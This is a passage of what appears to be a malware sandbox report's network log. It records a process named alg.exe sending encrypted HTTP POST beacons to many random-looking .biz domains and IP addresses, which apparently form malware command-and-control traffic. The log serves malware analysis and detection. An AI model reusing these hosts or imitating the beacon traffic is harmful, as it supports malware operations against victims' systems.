                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: z\Od%w5xtTi'\z\knK~J$Rhgt75c%/v2#i$mRri/\?nN_DA<+:BMR7p%N6rvma0d@l^M^q/*$;FEyNi8xLm=%V1u\L{1"D^/
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:53.670192003 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:53 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=45feb53b44ade53a61569a316f5227aa|155.94.241.187|1731920333|1731920333|0|1|0; path=/; domain=.typgfhb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        63192.168.2.105004234.211.97.45807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:53.877773046 CET356OUTPOST /dqqtqvvcpfgtdct HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: esuzf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:53.879940987 CET778OUTData Raw: 16 c7 13 47 d1 6d de ec fe 02 00 00 b3 a6 b3 d9 89 a6 53 f4 d5 e6 80 34 a1 98 c8 18 e8 81 2b f5 bc f6 e4 fc cf 9f 50 4e 31 ac cc 47 cb 1e 23 63 23 e8 83 2a d2 bc f7 e2 64 fb 8e ec 4b 46 4b d6 58 67 fd 59 b5 a4 63 29 07 0a 8b 2d 8d 25 59 8b 2d 08
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: GmS4+PN1G#c#*dKFKXgYc)-%Y-A/5^_/L'6nOQ_]I"vu5FXM_P3lx'-J,5G1&~MQ2m55}Lt y+-..s,gl*/70RUB_XN;%
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:54.716578960 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:54 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=daeaccf0ff0398d1563246b66cb15ad3|155.94.241.187|1731920334|1731920334|0|1|0; path=/; domain=.esuzf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        64192.168.2.10500433.94.10.34807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:55.053132057 CET351OUTPOST /wpbyxw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gvijgjwkh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:55.053148031 CET778OUTData Raw: 86 85 94 f8 09 4c 8e 54 fe 02 00 00 2c 2d 93 f2 27 e1 bc f2 cd b0 f5 c0 20 f6 4c c4 a8 fb 46 68 59 26 ea eb f9 48 eb e1 e9 f0 9d bd 86 4f 69 c4 46 d8 b5 c8 d4 71 47 9d 11 d9 d7 d2 ce d7 5b 83 31 1f 0f 17 db 24 34 93 4b a4 30 e8 0f 79 d2 26 cf 63
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: LT,-' LFhY&HOiFqG[1$4K0y&c`p5I>nd>f0J<PCfEAR3NScu-+xp#(KjR)V+P<8P!Bxa7Lyf>AO|6=$sU/@ZPHfa#S<$
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:55.726326942 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:55 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=155cb44b0bb969033128f32de1151ae4|155.94.241.187|1731920335|1731920335|0|1|0; path=/; domain=.gvijgjwkh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        65192.168.2.105004418.246.231.120807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:55.988648891 CET346OUTPOST /axu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: qpnczch.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:55.988667011 CET778OUTData Raw: 94 fb df 5e 0e 64 5f ea fe 02 00 00 86 38 dc ae ca 36 d5 64 d4 1f c2 59 a2 6e 92 8c 98 16 3b 82 52 f2 de 6a dd 5d 8e c0 0f d6 fa ae 84 3c bf 05 c8 2e 0d 44 fd 54 23 1e 76 ae 19 7a 09 15 4b 94 5b b8 a9 47 e6 6f 1e d7 38 39 d2 1d cd 2e 75 b4 bf 66
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ^d_86dYn;Rj]<.DT#vzK[Go89.uf.M;2!.lyzu1yc o4S|Yf`m}\MQda%38`9:`i/1'5SeJZMqwkak(#[,!omz}L@9KS4
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:56.823385000 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:56 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=8f3c702e9897b1c8a7cd9eca51a1a22a|155.94.241.187|1731920336|1731920336|0|1|0; path=/; domain=.qpnczch.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        66192.168.2.105004547.129.31.21280
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:56.217983007 CET358OUTPOST /dlnxocdhcatvbeh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: xlfhhhm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:56.218007088 CET834OUTData Raw: 1e 58 ba 54 77 ad db d3 36 03 00 00 9a 85 19 8c 1f 86 99 16 c8 10 d4 e3 6d 1e 3e 91 62 5a dc 74 40 3a 04 62 51 4f 9e cf 29 30 95 9a 0f 10 af cc 51 cb 7f 3c a2 88 c2 90 35 46 84 e9 26 80 f0 fb 59 72 0b df 00 34 b8 47 e3 49 56 f1 9d 20 73 e8 47 dd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: XTw6m>bZt@:bQO)0Q<5F&Yr4GIV sG>Pas!P+BMYC<1Dm_jmR& 4=SyQ88%r&;lbzlP=)xK%A)_5BP2~Tk8Cv
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:57.715383053 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:57 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=203cdacf23e73c8f1cdfe762b222d9fa|155.94.241.187|1731920337|1731920337|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        67192.168.2.10500463.254.94.185807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:57.045732975 CET345OUTPOST /ynbq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: brsua.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:57.045758963 CET778OUTData Raw: 6c 7a a2 64 dc ea 4f a7 fe 02 00 00 ef a8 9e 4f 19 b6 27 81 51 25 18 3e aa 5c 68 05 a8 1e 19 e0 c4 0d 30 75 fd e7 29 2b f2 95 d8 74 b5 74 fe 41 20 e7 d6 4d 19 cc 41 4b e7 c8 75 ed fa c2 25 d2 fa 38 32 be c9 83 74 a5 57 15 3a 5e 31 bc 60 97 80 f6
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: lzdOO'Q%>\h0u)+ttA MAKu%82tW:^1``cFp!j?8G]oNp2zmM7O-Y??!B$k"<u{?8CA_kb>Z+nzBg04h]Jy^_L}<KcK.
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:58.013690948 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:57 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=4fed6593e393e5c5221c826fd618a24b|155.94.241.187|1731920337|1731920337|0|1|0; path=/; domain=.brsua.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        68192.168.2.105004713.251.16.15080
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:57.740025997 CET348OUTPOST /qcmhkl HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: ifsaia.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:57.740039110 CET834OUTData Raw: a9 d6 a1 38 bf b3 ee ea 36 03 00 00 41 32 44 fe b8 c8 c5 c5 59 fc 50 ac 2d a1 21 6e b0 93 b9 6b d6 96 57 7a 42 ad 09 6b 2b a6 e7 94 33 fa 40 01 75 d6 98 76 f7 a9 52 19 a9 aa d9 d7 45 10 96 7b 82 35 b0 a7 06 ec 02 be 1b 93 db 4b 70 0f 47 ca 4c 12
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 86A2DYP-!nkWzBk+3@uvRE{5KpGLI\uTUe>QD0yAF(#:<re9o[rkoZzu7;V!GZ)f[,O|x;!wbTcV.R9y"$<QBEio
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:59.202399969 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:58 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=b0f349f81206c7cfa684db4fc971761a|155.94.241.187|1731920338|1731920338|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        69192.168.2.105004885.214.228.140807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:58.360749006 CET352OUTPOST /jsgrpxea HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: dlynankz.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:58.361597061 CET778OUTData Raw: 74 76 e0 be 7e 22 c0 b9 fe 02 00 00 5e 67 f9 e1 56 b7 41 83 98 99 98 9c 51 1b e8 39 63 6e 76 a8 a6 6f 3f 6e 2b 48 00 5d c1 fd 8f 45 87 14 82 0f fa e5 3e 3a c1 e2 5a 6f 72 9e ee 5d 4a c8 67 ce fd e0 76 07 c0 3b 05 a2 d2 21 26 1b 8b 89 ca d9 47 d4
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: tv~"^gVAQ9cnvo?n+H]E>:Zor]Jgv;!&G;CMF"vNQqU%U0Kz"H<]]SePVWqMb-(WKY;tFg*\FV]Ydk[R^+Ek)C3Os{=#
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:59.236730099 CET176INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 19
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 404 page not found
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:59.312644005 CET345OUTPOST /j HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: dlynankz.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:59.315334082 CET778OUTData Raw: d0 dc 8e 26 c4 6b dd 87 fe 02 00 00 e0 12 73 29 91 3d fe 81 e2 4a 85 04 6c eb 4e 56 ef 01 92 31 c0 2d 85 34 3a 24 86 0d 5d 36 3a 9d 38 5a 07 93 dd a0 6a 98 d4 7c cc 7c 24 f7 b6 d6 33 d9 3b 0a cf 4f be c6 52 82 45 71 5e ab c1 94 90 a0 f5 32 0f a7
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: &ks)=JlNV1-4:$]6:8Zj||$3;OREq^2$s:cQD,6/6bx[M]p99_DZH\GvXO(|(Kr4HdP/1_r (ES}edRT%0z5=zjY


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        70192.168.2.105004944.221.84.10580
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:59.225713968 CET349OUTPOST /kvae HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: saytjshyf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:59.225785017 CET834OUTData Raw: 97 02 ff 3e 0c 76 6c de 36 03 00 00 1d 2f 53 da 87 c3 40 68 da f0 30 0b 55 64 d4 a7 8a fe 26 1b 0a 92 c8 06 26 46 5d 62 51 40 a6 a5 5a 8e 71 4e 87 39 09 b0 c3 78 e3 14 29 5b f9 3f 0f 65 2e f3 d9 f0 03 07 82 d9 ad e8 79 4c aa 20 22 3d 84 68 fa 30
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: >vl6/S@h0Ud&&F]bQ@ZqN9x)[?e.yL "=h0S104Rx@mV`pH|dGw0DmGS?h7t'^O%oG;UAw=?_C:L5EW(RTuce,))]JjSxe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:59.890085936 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=d501510c2ce0a5afc843090e9545a464|155.94.241.187|1731920339|1731920339|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        71192.168.2.105005047.129.31.212807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:59.626430035 CET354OUTPOST /eiatwbrknxj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: oflybfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:59.626458883 CET778OUTData Raw: 2e 83 bc 18 de 28 e4 93 fe 02 00 00 82 c2 b6 60 43 9d 57 f5 fd 82 bd ff a6 ca 48 0e 47 1e 9d 1d a5 d2 86 5c 38 6d 0c 28 30 97 08 99 29 87 5c b3 30 2f cd 0a 35 05 95 d5 06 ec 2d aa 91 a4 14 3e 4d 16 fa ee 83 f2 ef 89 67 99 36 b5 b9 e6 ec 4f c0 f6
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: .(`CWHG\8m(0)\0/5->Mg6O=C(?1IlV%pzNFbf3t>XdG| n>~7&px@=R8hr9n'{PuJbniK<]U8yjE=OIf{r+#<
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:01.100198030 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=f7dc6ef8b137a31606d58abae93d6644|155.94.241.187|1731920340|1731920340|0|1|0; path=/; domain=.oflybfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
